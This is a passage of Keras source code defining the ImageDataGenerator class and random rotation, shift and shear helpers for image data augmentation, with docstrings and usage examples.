df[y_col] = df[y_col].apply(lambda x: remove_classes(x, classes))
else:
classes = set()
for v in df[y_col]:
if isinstance(v, (list, tuple)):
classes.update(v)
else:
classes.add(v)
classes = sorted(classes)
return df.dropna(subset=[y_col]), classes
def _filter_valid_filepaths(self, df, x_col):
"""Keep only dataframe rows with valid filenames.
Args:
df: Pandas dataframe containing filenames in a column
x_col: string, column in `df` that contains the filenames or filepaths
Returns:
absolute paths to image files
"""
filepaths = df[x_col].map(lambda fname: os.path.join(self.directory, fname))
mask = filepaths.apply(validate_filename, args=(self.white_list_formats,))
n_invalid = (~mask).sum()
if n_invalid:
warnings.warn('Found {} invalid image filename(s) in x_col="{}". '
'These filename(s) will be ignored.'.format(
n_invalid, x_col))
return df[mask]
@property
def filepaths(self):
return self._filepaths
@property
def labels(self):
if self.class_mode in {'multi_output', 'raw'}:
return self._targets
else:
return self.classes
@property
def sample_weight(self):
return self._sample_weight
def flip_axis(x, axis):
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
@keras_export('keras.preprocessing.image.ImageDataGenerator')
class ImageDataGenerator():
"""Generate batches of tensor image data with real-time data augmentation.
Warning: `tf.keras.preprocessing.image.ImageDataGenerator` is not recommended
for new code. Prefer loading images with
`tf.keras.utils.image_dataset_from_directory` and transforming the output
`tf.data.Dataset` with preprocessing layers. For more information, see the
tutorials for [loading images](
https://www.tensorflow.org/tutorials/load_data/images) and
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
The data will be looped over (in batches).
Args:
featurewise_center: Boolean. Set input mean to 0 over the dataset,
feature-wise.
samplewise_center: Boolean. Set each sample mean to 0.
featurewise_std_normalization: Boolean. Divide inputs by std of the
dataset, feature-wise.
samplewise_std_normalization: Boolean. Divide each input by its std.
zca_epsilon: epsilon for ZCA whitening. Default is 1e-6.
zca_whitening: Boolean. Apply ZCA whitening.
rotation_range: Int. Degree range for random rotations.
width_shift_range: Float, 1-D array-like or int
- float: fraction of total width, if < 1, or pixels if >= 1.
- 1-D array-like: random elements from the array.
- int: integer number of pixels from interval `(-width_shift_range,
+width_shift_range)` - With `width_shift_range=2` possible values
are integers `[-1, 0, +1]`, same as with `width_shift_range=[-1, 0,
+1]`, while with `width_shift_range=1.0` possible values are floats
in the interval [-1.0, +1.0).
height_shift_range: Float, 1-D array-like or int
- float: fraction of total height, if < 1, or pixels if >= 1.
- 1-D array-like: random elements from the array.
- int: integer number of pixels from interval `(-height_shift_range,
+height_shift_range)` - With `height_shift_range=2` possible values
are integers `[-1, 0, +1]`, same as with `height_shift_range=[-1, 0,
+1]`, while with `height_shift_range=1.0` possible values are floats
in the interval [-1.0, +1.0).
brightness_range: Tuple or list of two floats. Range for picking a
brightness shift value from.
shear_range: Float. Shear Intensity (Shear angle in counter-clockwise
direction in degrees)
zoom_range: Float or [lower, upper]. Range for random zoom. If a float,
`[lower, upper] = [1-zoom_range, 1+zoom_range]`.
channel_shift_range: Float. Range for random channel shifts.
fill_mode: One of {"constant", "nearest", "reflect" or "wrap"}. Default is
'nearest'. Points outside the boundaries of the input are filled
according to the given mode:
- 'constant': kkkkkkkk|abcd|kkkkkkkk (cval=k)
- 'nearest': aaaaaaaa|abcd|dddddddd
- 'reflect': abcddcba|abcd|dcbaabcd
- 'wrap': abcdabcd|abcd|abcdabcd
cval: Float or Int. Value used for points outside the boundaries when
`fill_mode = "constant"`.
horizontal_flip: Boolean. Randomly flip inputs horizontally.
vertical_flip: Boolean. Randomly flip inputs vertically.
rescale: rescaling factor. Defaults to None. If None or 0, no rescaling is
applied, otherwise we multiply the data by the value provided (after
applying all other transformations).
preprocessing_function: function that will be applied on each input. The
function will run after the image is resized and augmented.
The function should take one argument: one image (Numpy tensor with
rank 3), and should output a Numpy tensor with the same shape.
data_format: Image data format, either "channels_first" or
"channels_last". "channels_last" mode means that the images should have
shape `(samples, height, width, channels)`, "channels_first" mode means
that the images should have shape `(samples, channels, height, width)`.
It defaults to the `image_data_format` value found in your Keras config
file at `~/.keras/keras.json`. If you never set it, then it will be
"channels_last".
validation_split: Float. Fraction of images reserved for validation
(strictly between 0 and 1).
dtype: Dtype to use for the generated arrays.
Raises:
ValueError: If the value of the argument, `data_format` is other than
`"channels_last"` or `"channels_first"`.
ValueError: If the value of the argument, `validation_split` > 1
or `validation_split` < 0.
Examples:
Example of using `.flow(x, y)`:
```python
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
y_train = utils.to_categorical(y_train, num_classes)
y_test = utils.to_categorical(y_test, num_classes)
datagen = ImageDataGenerator(
featurewise_center=True,
featurewise_std_normalization=True,
rotation_range=20,
width_shift_range=0.2,
height_shift_range=0.2,
horizontal_flip=True,
validation_split=0.2)
# compute quantities required for featurewise normalization
# (std, mean, and principal components if ZCA whitening is applied)
datagen.fit(x_train)
# fits the model on batches with real-time data augmentation:
model.fit(datagen.flow(x_train, y_train, batch_size=32,
subset='training'),
validation_data=datagen.flow(x_train, y_train,
batch_size=8, subset='validation'),
steps_per_epoch=len(x_train) / 32, epochs=epochs)
# here's a more "manual" example
for e in range(epochs):
print('Epoch', e)
batches = 0
for x_batch, y_batch in datagen.flow(x_train, y_train, batch_size=32):
model.fit(x_batch, y_batch)
batches += 1
if batches >= len(x_train) / 32:
# we need to break the loop by hand because
# the generator loops indefinitely
break
```
Example of using `.flow_from_directory(directory)`:
```python
train_datagen = ImageDataGenerator(
rescale=1./255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
'data/train',
target_size=(150, 150),
batch_size=32,
class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
'data/validation',
target_size=(150, 150),
batch_size=32,
class_mode='binary')
model.fit(
train_generator,
steps_per_epoch=2000,
epochs=50,
validation_data=validation_generator,
validation_steps=800)
```
Example of transforming images and masks together.
```python
# we create two instances with the same arguments
data_gen_args = dict(featurewise_center=True,
featurewise_std_normalization=True,
rotation_range=90,
width_shift_range=0.1,
height_shift_range=0.1,
zoom_range=0.2)
image_datagen = ImageDataGenerator(**data_gen_args)
mask_datagen = ImageDataGenerator(**data_gen_args)
# Provide the same seed and keyword arguments to the fit and flow methods
seed = 1
image_datagen.fit(images, augment=True, seed=seed)
mask_datagen.fit(masks, augment=True, seed=seed)
image_generator = image_datagen.flow_from_directory(
'data/images',
class_mode=None,
seed=seed)
mask_generator = mask_datagen.flow_from_directory(
'data/masks',
class_mode=None,
seed=seed)
# combine generators into one which yields image and masks
train_generator = zip(image_generator, mask_generator)
model.fit(
train_generator,
steps_per_epoch=2000,
epochs=50)
```
"""
def __init__(self,
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
zca_epsilon=1e-6,
rotation_range=0,
width_shift_range=0.,
height_shift_range=0.,
brightness_range=None,
shear_range=0.,
zoom_range=0.,
channel_shift_range=0.,
fill_mode='nearest',
cval=0.,
horizontal_flip=False,
vertical_flip=False,
rescale=None,
preprocessing_function=None,
data_format=None,
validation_split=0.0,
interpolation_order=1,
dtype=None):
if data_format is None:
data_format = backend.image_data_format()
if dtype is None:
dtype = backend.floatx()
self.featurewise_center = featurewise_center
self.samplewise_center = samplewise_center
self.featurewise_std_normalization = featurewise_std_normalization
self.samplewise_std_normalization = samplewise_std_normalization
self.zca_whitening = zca_whitening
self.zca_epsilon = zca_epsilon
self.rotation_range = rotation_range
self.width_shift_range = width_shift_range
self.height_shift_range = height_shift_range
self.shear_range = shear_range
self.zoom_range = zoom_range
self.channel_shift_range = channel_shift_range
self.fill_mode = fill_mode
self.cval = cval
self.horizontal_flip = horizontal_flip
self.vertical_flip = vertical_flip
self.rescale = rescale
self.preprocessing_function = preprocessing_function
self.dtype = dtype
self.interpolation_order = interpolation_order
if data_format not in {'channels_last', 'channels_first'}:
raise ValueError('`data_format` should be `"channels_last"` '
'(channel after row and column) or '
'`"channels_first"` (channel before row and column). '
'Received: %s' % data_format)
self.data_format = data_format
if data_format == 'channels_first':
self.channel_axis = 1
self.row_axis = 2
self.col_axis = 3
if data_format == 'channels_last':
self.channel_axis = 3
self.row_axis = 1
self.col_axis = 2
if validation_split and not 0 < validation_split < 1:
raise ValueError('`validation_split` must be strictly between 0 and 1. '
' Received: %s' % validation_split)
self._validation_split = validation_split
self.mean = None
self.std = None
self.zca_whitening_matrix = None
if isinstance(zoom_range, (float, int)):
self.zoom_range = [1 - zoom_range, 1 + zoom_range]
elif (len(zoom_range) == 2 and
all(isinstance(val, (float, int)) for val in zoom_range)):
self.zoom_range = [zoom_range[0], zoom_range[1]]
else:
raise ValueError('`zoom_range` should be a float or '
'a tuple or list of two floats. '
'Received: %s' % (zoom_range,))
if zca_whitening:
if not featurewise_center:
self.featurewise_center = True
warnings.warn('This ImageDataGenerator specifies '
'`zca_whitening`, which overrides '
'setting of `featurewise_center`.')
if featurewise_std_normalization:
self.featurewise_std_normalization = False
warnings.warn('This ImageDataGenerator specifies '
'`zca_whitening` '
'which overrides setting of'
'`featurewise_std_normalization`.')
if featurewise_std_normalization:
if not featurewise_center:
self.featurewise_center = True
warnings.warn('This ImageDataGenerator specifies '
'`featurewise_std_normalization`, '
'which overrides setting of '
'`featurewise_center`.')
if samplewise_std_normalization:
if not samplewise_center:
self.samplewise_center = True
warnings.warn('This ImageDataGenerator specifies '
'`samplewise_std_normalization`, '
'which overrides setting of '
'`samplewise_center`.')
if brightness_range is not None:
if (not isinstance(brightness_range, (tuple, list)) or
len(brightness_range) != 2):
raise ValueError(
'`brightness_range should be tuple or list of two floats. '
'Received: %s' % (brightness_range,))
self.brightness_range = brightness_range
def flow(self,
x,
y=None,
batch_size=32,
shuffle=True,
sample_weight=None,
seed=None,
save_to_dir=None,
save_prefix='',
save_format='png',
ignore_class_split=False,
subset=None):
"""Takes data & label arrays, generates batches of augmented data.
Args:
x: Input data. Numpy array of rank 4 or a tuple. If tuple, the first
element should contain the images and the second element another numpy
array or a list of numpy arrays that gets passed to the output without
any modifications. Can be used to feed the model miscellaneous data
along with the images. In case of grayscale data, the channels axis of
the image array should have value 1, in case of RGB data, it should
have value 3, and in case of RGBA data, it should have value 4.
y: Labels.
batch_size: Int (default: 32).
shuffle: Boolean (default: True).
sample_weight: Sample weights.
seed: Int (default: None).
save_to_dir: None or str (default: None). This allows you to optionally
specify a directory to which to save the augmented pictures being
generated (useful for visualizing what you are doing).
save_prefix: Str (default: `''`). Prefix to use for filenames of saved
pictures (only relevant if `save_to_dir` is set).
save_format: one of "png", "jpeg", "bmp", "pdf", "ppm", "gif", "tif",
"jpg" (only relevant if `save_to_dir` is set). Default: "png".
ignore_class_split: Boolean (default: False), ignore difference
in number of classes in labels across train and validation
split (useful for non-classification tasks)
subset: Subset of data (`"training"` or `"validation"`) if
`validation_split` is set in `ImageDataGenerator`.
Returns:
An `Iterator` yielding tuples of `(x, y)`
where `x` is a numpy array of image data
(in the case of a single image input) or a list
of numpy arrays (in the case with
additional inputs) and `y` is a numpy array
of corresponding labels. If 'sample_weight' is not None,
the yielded tuples are of the form `(x, y, sample_weight)`.
If `y` is None, only the numpy array `x` is returned.
Raises:
ValueError: If the Value of the argument, `subset` is other than
"training" or "validation".
"""
return NumpyArrayIterator(
x,
y,
self,
batch_size=batch_size,
shuffle=shuffle,
sample_weight=sample_weight,
seed=seed,
data_format=self.data_format,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
ignore_class_split=ignore_class_split,
subset=subset,
dtype=self.dtype)
def flow_from_directory(self,
directory,
target_size=(256, 256),
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=32,
shuffle=True,
seed=None,
save_to_dir=None,
save_prefix='',
save_format='png',
follow_links=False,
subset=None,
interpolation='nearest',
keep_aspect_ratio=False):
"""Takes the path to a directory & generates batches of augmented data.
Args:
directory: string, path to the target directory. It should contain one
subdirectory per class. Any PNG, JPG, BMP, PPM or TIF images inside
each of the subdirectories directory tree will be included in the
generator. See [this script](
https://gist.github.com/fchollet/0830affa1f7f19fd47b06d4cf89ed44d)
for more details.
target_size: Tuple of integers `(height, width)`, defaults to `(256,
256)`. The dimensions to which all images found will be resized.
color_mode: One of "grayscale", "rgb", "rgba". Default: "rgb". Whether
the images will be converted to have 1, 3, or 4 channels.
classes: Optional list of class subdirectories
(e.g. `['dogs', 'cats']`). Default: None. If not provided, the list
of classes will be automatically inferred from the subdirectory
names/structure under `directory`, where each subdirectory will be
treated as a different class (and the order of the classes, which
will map to the label indices, will be alphanumeric). The
dictionary containing the mapping from class names to class
indices can be obtained via the attribute `class_indices`.
class_mode: One of "categorical", "binary", "sparse",
"input", or None. Default: "categorical".
Determines the type of label arrays that are returned:
- "categorical" will be 2D one-hot encoded labels,
- "binary" will be 1D binary labels,
"sparse" will be 1D integer labels,
- "input" will be images identical
to input images (mainly used to work with autoencoders).
- If None, no labels are returned
(the generator will only yield batches of image data,
which is useful to use with `model.predict_generator()`).
Please note that in case of class_mode None,
the data still needs to reside in a subdirectory
of `directory` for it to work correctly.
batch_size: Size of the batches of data (default: 32).
shuffle: Whether to shuffle the data (default: True) If set to False,
sorts the data in alphanumeric order.
seed: Optional random seed for shuffling and transformations.
save_to_dir: None or str (default: None). This allows you to optionally
specify a directory to which to save the augmented pictures being
generated (useful for visualizing what you are doing).
save_prefix: Str. Prefix to use for filenames of saved pictures (only
relevant if `save_to_dir` is set).
save_format: one of "png", "jpeg", "bmp", "pdf", "ppm", "gif", "tif",
"jpg"
(only relevant if `save_to_dir` is set). Default: "png".
follow_links: Whether to follow symlinks inside
class subdirectories (default: False).
subset: Subset of data (`"training"` or `"validation"`) if
`validation_split` is set in `ImageDataGenerator`.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image. Supported
methods are `"nearest"`, `"bilinear"`, and `"bicubic"`. If PIL version
1.1.3 or newer is installed, `"lanczos"` is also supported. If PIL
version 3.4.0 or newer is installed, `"box"` and `"hamming"` are also
supported. By default, `"nearest"` is used.
keep_aspect_ratio: Boolean, whether to resize images to a target
size without aspect ratio distortion. The image is cropped in
the center with target aspect ratio before resizing.
Returns:
A `DirectoryIterator` yielding tuples of `(x, y)`
where `x` is a numpy array containing a batch
of images with shape `(batch_size, *target_size, channels)`
and `y` is a numpy array of corresponding labels.
"""
return DirectoryIterator(
directory,
self,
target_size=target_size,
color_mode=color_mode,
keep_aspect_ratio=keep_aspect_ratio,
classes=classes,
class_mode=class_mode,
data_format=self.data_format,
batch_size=batch_size,
shuffle=shuffle,
seed=seed,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
follow_links=follow_links,
subset=subset,
interpolation=interpolation,
dtype=self.dtype)
def flow_from_dataframe(self,
dataframe,
directory=None,
x_col='filename',
y_col='class',
weight_col=None,
target_size=(256, 256),
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=32,
shuffle=True,
seed=None,
save_to_dir=None,
save_prefix='',
save_format='png',
subset=None,
interpolation='nearest',
validate_filenames=True,
**kwargs):
"""Takes the dataframe and the path to a directory + generates batches.
The generated batches contain augmented/normalized data.
**A simple tutorial can be found **[here](
http://bit.ly/keras_flow_from_dataframe).
Args:
dataframe: Pandas dataframe containing the filepaths relative to
`directory` (or absolute paths if `directory` is None) of the
images in a string column. It should include other column/s
depending on the `class_mode`:
- if `class_mode` is `"categorical"` (default value) it must
include the `y_col` column with the class/es of each image.
Values in column can be string/list/tuple if a single class
or list/tuple if multiple classes.
- if `class_mode` is `"binary"` or `"sparse"` it must include
the given `y_col` column with class values as strings.
- if `class_mode` is `"raw"` or `"multi_output"` it should contain
the columns specified in `y_col`.
- if `class_mode` is `"input"` or `None` no extra column is needed.
directory: string, path to the directory to read images from. If `None`,
data in `x_col` column should be absolute paths.
x_col: string, column in `dataframe` that contains the filenames (or
absolute paths if `directory` is `None`).
y_col: string or list, column/s in `dataframe` that has the target data.
weight_col: string, column in `dataframe` that contains the sample
weights. Default: `None`.
target_size: tuple of integers `(height, width)`, default: `(256, 256)`.
The dimensions to which all images found will be resized.
color_mode: one of "grayscale", "rgb", "rgba". Default: "rgb". Whether
the images will be converted to have 1 or 3 color channels.
classes: optional list of classes (e.g. `['dogs', 'cats']`). Default is
None. If not provided, the list of classes will be automatically
inferred from the `y_col`, which will map to the label indices, will
be alphanumeric). The dictionary containing the mapping from class
names to class indices can be obtained via the attribute
`class_indices`.
class_mode: one of "binary", "categorical", "input", "multi_output",
"raw", sparse" or None. Default: "categorical".
Mode for yielding the targets:
- `"binary"`: 1D numpy array of binary labels,
- `"categorical"`: 2D numpy array of one-hot encoded labels.
Supports multi-label output.
- `"input"`: images identical to input images (mainly used to work
with autoencoders),
- `"multi_output"`: list with the values of the different columns,
- `"raw"`: numpy array of values in `y_col` column(s),
- `"sparse"`: 1D numpy array of integer labels, - `None`, no targets
are returned (the generator will only yield batches of image data,
which is useful to use in `model.predict()`).
batch_size: size of the batches of data (default: 32).
shuffle: whether to shuffle the data (default: True)
seed: optional random seed for shuffling and transformations.
save_to_dir: None or str (default: None). This allows you to optionally
specify a directory to which to save the augmented pictures being
generated (useful for visualizing what you are doing).
save_prefix: str. Prefix to use for filenames of saved pictures (only
relevant if `save_to_dir` is set).
save_format: one of "png", "jpeg", "bmp", "pdf", "ppm", "gif", "tif",
"jpg" (only relevant if `save_to_dir` is set). Default: "png".
subset: Subset of data (`"training"` or `"validation"`) if
`validation_split` is set in `ImageDataGenerator`.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image. Supported
methods are `"nearest"`, `"bilinear"`, and `"bicubic"`. If PIL version
1.1.3 or newer is installed, `"lanczos"` is also supported. If PIL
version 3.4.0 or newer is installed, `"box"` and `"hamming"` are also
supported. By default, `"nearest"` is used.
validate_filenames: Boolean, whether to validate image filenames in
`x_col`. If `True`, invalid images will be ignored. Disabling this
option can lead to speed-up in the execution of this function.
Defaults to `True`.
**kwargs: legacy arguments for raising deprecation warnings.
Returns:
A `DataFrameIterator` yielding tuples of `(x, y)`
where `x` is a numpy array containing a batch
of images with shape `(batch_size, *target_size, channels)`
and `y` is a numpy array of corresponding labels.
"""
if 'has_ext' in kwargs:
warnings.warn(
'has_ext is deprecated, filenames in the dataframe have '
'to match the exact filenames in disk.', DeprecationWarning)
if 'sort' in kwargs:
warnings.warn(
'sort is deprecated, batches will be created in the'
'same order than the filenames provided if shuffle'
'is set to False.', DeprecationWarning)
if class_mode == 'other':
warnings.warn(
'`class_mode` "other" is deprecated, please use '
'`class_mode` "raw".', DeprecationWarning)
class_mode = 'raw'
if 'drop_duplicates' in kwargs:
warnings.warn(
'drop_duplicates is deprecated, you can drop duplicates '
'by using the pandas.DataFrame.drop_duplicates method.',
DeprecationWarning)
return DataFrameIterator(
dataframe,
directory,
self,
x_col=x_col,
y_col=y_col,
weight_col=weight_col,
target_size=target_size,
color_mode=color_mode,
classes=classes,
class_mode=class_mode,
data_format=self.data_format,
batch_size=batch_size,
shuffle=shuffle,
seed=seed,
save_to_dir=save_to_dir,
save_prefix=save_prefix,
save_format=save_format,
subset=subset,
interpolation=interpolation,
validate_filenames=validate_filenames,
dtype=self.dtype)
def standardize(self, x):
"""Applies the normalization configuration in-place to a batch of inputs.
`x` is changed in-place since the function is mainly used internally
to standardize images and feed them to your network. If a copy of `x`
would be created instead it would have a significant performance cost.
If you want to apply this method without changing the input in-place
you can call the method creating a copy before:
standardize(np.copy(x))
Args:
x: Batch of inputs to be normalized.
Returns:
The inputs, normalized.
"""
if self.preprocessing_function:
x = self.preprocessing_function(x)
if self.rescale:
x *= self.rescale
if self.samplewise_center:
x -= np.mean(x, keepdims=True)
if self.samplewise_std_normalization:
x /= (np.std(x, keepdims=True) + 1e-6)
if self.featurewise_center:
if self.mean is not None:
x -= self.mean
else:
warnings.warn('This ImageDataGenerator specifies '
'`featurewise_center`, but it hasn\'t '
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
if self.featurewise_std_normalization:
if self.std is not None:
x /= (self.std + 1e-6)
else:
warnings.warn('This ImageDataGenerator specifies '
'`featurewise_std_normalization`, '
'but it hasn\'t '
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
if self.zca_whitening:
if self.zca_whitening_matrix is not None:
flat_x = x.reshape(-1, np.prod(x.shape[-3:]))
white_x = flat_x @ self.zca_whitening_matrix
x = np.reshape(white_x, x.shape)
else:
warnings.warn('This ImageDataGenerator specifies '
'`zca_whitening`, but it hasn\'t '
'been fit on any training data. Fit it '
'first by calling `.fit(numpy_data)`.')
return x
def get_random_transform(self, img_shape, seed=None):
"""Generates random parameters for a transformation.
Args:
img_shape: Tuple of integers.
Shape of the image that is transformed.
seed: Random seed.
Returns:
A dictionary containing randomly chosen parameters describing the
transformation.
"""
img_row_axis = self.row_axis - 1
img_col_axis = self.col_axis - 1
if seed is not None:
np.random.seed(seed)
if self.rotation_range:
theta = np.random.uniform(-self.rotation_range, self.rotation_range)
else:
theta = 0
if self.height_shift_range:
try: # 1-D array-like or int
tx = np.random.choice(self.height_shift_range)
tx *= np.random.choice([-1, 1])
except ValueError: # floating point
tx = np.random.uniform(-self.height_shift_range,
self.height_shift_range)
if np.max(self.height_shift_range) < 1:
tx *= img_shape[img_row_axis]
else:
tx = 0
if self.width_shift_range:
try: # 1-D array-like or int
ty = np.random.choice(self.width_shift_range)
ty *= np.random.choice([-1, 1])
except ValueError: # floating point
ty = np.random.uniform(-self.width_shift_range, self.width_shift_range)
if np.max(self.width_shift_range) < 1:
ty *= img_shape[img_col_axis]
else:
ty = 0
if self.shear_range:
shear = np.random.uniform(-self.shear_range, self.shear_range)
else:
shear = 0
if self.zoom_range[0] == 1 and self.zoom_range[1] == 1:
zx, zy = 1, 1
else:
zx, zy = np.random.uniform(self.zoom_range[0], self.zoom_range[1], 2)
flip_horizontal = (np.random.random() < 0.5) * self.horizontal_flip
flip_vertical = (np.random.random() < 0.5) * self.vertical_flip
channel_shift_intensity = None
if self.channel_shift_range != 0:
channel_shift_intensity = np.random.uniform(-self.channel_shift_range,
self.channel_shift_range)
brightness = None
if self.brightness_range is not None:
brightness = np.random.uniform(self.brightness_range[0],
self.brightness_range[1])
transform_parameters = {
'theta': theta,
'tx': tx,
'ty': ty,
'shear': shear,
'zx': zx,
'zy': zy,
'flip_horizontal': flip_horizontal,
'flip_vertical': flip_vertical,
'channel_shift_intensity': channel_shift_intensity,
'brightness': brightness
}
return transform_parameters
def apply_transform(self, x, transform_parameters):
"""Applies a transformation to an image according to given parameters.
Args:
x: 3D tensor, single image.
transform_parameters: Dictionary with string - parameter pairs
describing the transformation.
Currently, the following parameters
from the dictionary are used:
- `'theta'`: Float. Rotation angle in degrees.
- `'tx'`: Float. Shift in the x direction.
- `'ty'`: Float. Shift in the y direction.
- `'shear'`: Float. Shear angle in degrees.
- `'zx'`: Float. Zoom in the x direction.
- `'zy'`: Float. Zoom in the y direction.
- `'flip_horizontal'`: Boolean. Horizontal flip.
- `'flip_vertical'`: Boolean. Vertical flip.
- `'channel_shift_intensity'`: Float. Channel shift intensity.
- `'brightness'`: Float. Brightness shift intensity.
Returns:
A transformed version of the input (same shape).
"""
# x is a single image, so it doesn't have image number at index 0
img_row_axis = self.row_axis - 1
img_col_axis = self.col_axis - 1
img_channel_axis = self.channel_axis - 1
x = apply_affine_transform(
x,
transform_parameters.get('theta', 0),
transform_parameters.get('tx', 0),
transform_parameters.get('ty', 0),
transform_parameters.get('shear', 0),
transform_parameters.get('zx', 1),
transform_parameters.get('zy', 1),
row_axis=img_row_axis,
col_axis=img_col_axis,
channel_axis=img_channel_axis,
fill_mode=self.fill_mode,
cval=self.cval,
order=self.interpolation_order)
if transform_parameters.get('channel_shift_intensity') is not None:
x = apply_channel_shift(x,
transform_parameters['channel_shift_intensity'],
img_channel_axis)
if transform_parameters.get('flip_horizontal', False):
x = flip_axis(x, img_col_axis)
if transform_parameters.get('flip_vertical', False):
x = flip_axis(x, img_row_axis)
if transform_parameters.get('brightness') is not None:
x = apply_brightness_shift(x, transform_parameters['brightness'], False)
return x
def random_transform(self, x, seed=None):
"""Applies a random transformation to an image.
Args:
x: 3D tensor, single image.
seed: Random seed.
Returns:
A randomly transformed version of the input (same shape).
"""
params = self.get_random_transform(x.shape, seed)
return self.apply_transform(x, params)
def fit(self, x, augment=False, rounds=1, seed=None):
"""Fits the data generator to some sample data.
This computes the internal data stats related to the
data-dependent transformations, based on an array of sample data.
Only required if `featurewise_center` or
`featurewise_std_normalization` or `zca_whitening` are set to True.
When `rescale` is set to a value, rescaling is applied to
sample data before computing the internal data stats.
Args:
x: Sample data. Should have rank 4.
In case of grayscale data,
the channels axis should have value 1, in case
of RGB data, it should have value 3, and in case
of RGBA data, it should have value 4.
augment: Boolean (default: False).
Whether to fit on randomly augmented samples.
rounds: Int (default: 1).
If using data augmentation (`augment=True`),
this is how many augmentation passes over the data to use.
seed: Int (default: None). Random seed.
"""
x = np.asarray(x, dtype=self.dtype)
if x.ndim != 4:
raise ValueError('Input to `.fit()` should have rank 4. '
'Got array with shape: ' + str(x.shape))
if x.shape[self.channel_axis] not in {1, 3, 4}:
warnings.warn('Expected input to be images (as Numpy array) '
'following the data format convention "' +
self.data_format + '" (channels on axis ' +
str(self.channel_axis) + '), i.e. expected '
'either 1, 3 or 4 channels on axis ' +
str(self.channel_axis) + '. '
'However, it was passed an array with shape ' +
str(x.shape) + ' (' + str(x.shape[self.channel_axis]) +
' channels).')
if seed is not None:
np.random.seed(seed)
x = np.copy(x)
if self.rescale:
x *= self.rescale
if augment:
ax = np.zeros(
tuple([rounds * x.shape[0]] + list(x.shape)[1:]), dtype=self.dtype)
for r in range(rounds):
for i in range(x.shape[0]):
ax[i + r * x.shape[0]] = self.random_transform(x[i])
x = ax
if self.featurewise_center:
self.mean = np.mean(x, axis=(0, self.row_axis, self.col_axis))
broadcast_shape = [1, 1, 1]
broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
self.mean = np.reshape(self.mean, broadcast_shape)
x -= self.mean
if self.featurewise_std_normalization:
self.std = np.std(x, axis=(0, self.row_axis, self.col_axis))
broadcast_shape = [1, 1, 1]
broadcast_shape[self.channel_axis - 1] = x.shape[self.channel_axis]
self.std = np.reshape(self.std, broadcast_shape)
x /= (self.std + 1e-6)
if self.zca_whitening:
n = len(x)
flat_x = np.reshape(x, (n, -1))
u, s, _ = np.linalg.svd(flat_x.T, full_matrices=False)
s_inv = np.sqrt(n) / (s + self.zca_epsilon)
self.zca_whitening_matrix = (u * s_inv).dot(u.T)
@keras_export('keras.preprocessing.image.random_rotation')
def random_rotation(x, rg, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random rotation of a Numpy image tensor.
Warning: `tf.keras.preprocessing.image.random_rotation` does not operate on
tensors and is not recommended for new code. Prefer
`tf.keras.layers.RandomRotation` which provides equivalent functionality as a
preprocessing layer. For more information, see the tutorial for
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
x: Input tensor. Must be 3D.
rg: Rotation range, in degrees.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order: int, order of spline interpolation.
see `ndimage.interpolation.affine_transform`
Returns:
Rotated Numpy image tensor.
"""
theta = np.random.uniform(-rg, rg)
x = apply_affine_transform(x,
theta=theta,
row_axis=row_axis,
col_axis=col_axis,
channel_axis=channel_axis,
fill_mode=fill_mode,
cval=cval,
order=interpolation_order)
return x
@keras_export('keras.preprocessing.image.random_shift')
def random_shift(x, wrg, hrg, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial shift of a Numpy image tensor.
Warning: `tf.keras.preprocessing.image.random_shift` does not operate on
tensors and is not recommended for new code. Prefer
`tf.keras.layers.RandomTranslation` which provides equivalent functionality as
a preprocessing layer. For more information, see the tutorial for
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
x: Input tensor. Must be 3D.
wrg: Width shift range, as a float fraction of the width.
hrg: Height shift range, as a float fraction of the height.
row_axis: Index of axis for rows in the input tensor.
col_axis: Index of axis for columns in the input tensor.
channel_axis: Index of axis for channels in the input tensor.
fill_mode: Points outside the boundaries of the input
are filled according to the given mode
(one of `{'constant', 'nearest', 'reflect', 'wrap'}`).
cval: Value used for points outside the boundaries
of the input if `mode='constant'`.
interpolation_order: int, order of spline interpolation.
see `ndimage.interpolation.affine_transform`
Returns:
Shifted Numpy image tensor.
"""
h, w = x.shape[row_axis], x.shape[col_axis]
tx = np.random.uniform(-hrg, hrg) * h
ty = np.random.uniform(-wrg, wrg) * w
x = apply_affine_transform(x,
tx=tx,
ty=ty,
row_axis=row_axis,
col_axis=col_axis,
channel_axis=channel_axis,
fill_mode=fill_mode,
cval=cval,
order=interpolation_order)
return x
@keras_export('keras.preprocessing.image.random_shear')
def random_shear(x, intensity, row_axis=1, col_axis=2, channel_axis=0,
fill_mode='nearest', cval=0., interpolation_order=1):
"""Performs a random spatial shear of a Numpy image tensor.
Args:
x: Input tensor. Must be 3D.
intensity: Transformation intensity in degrees.
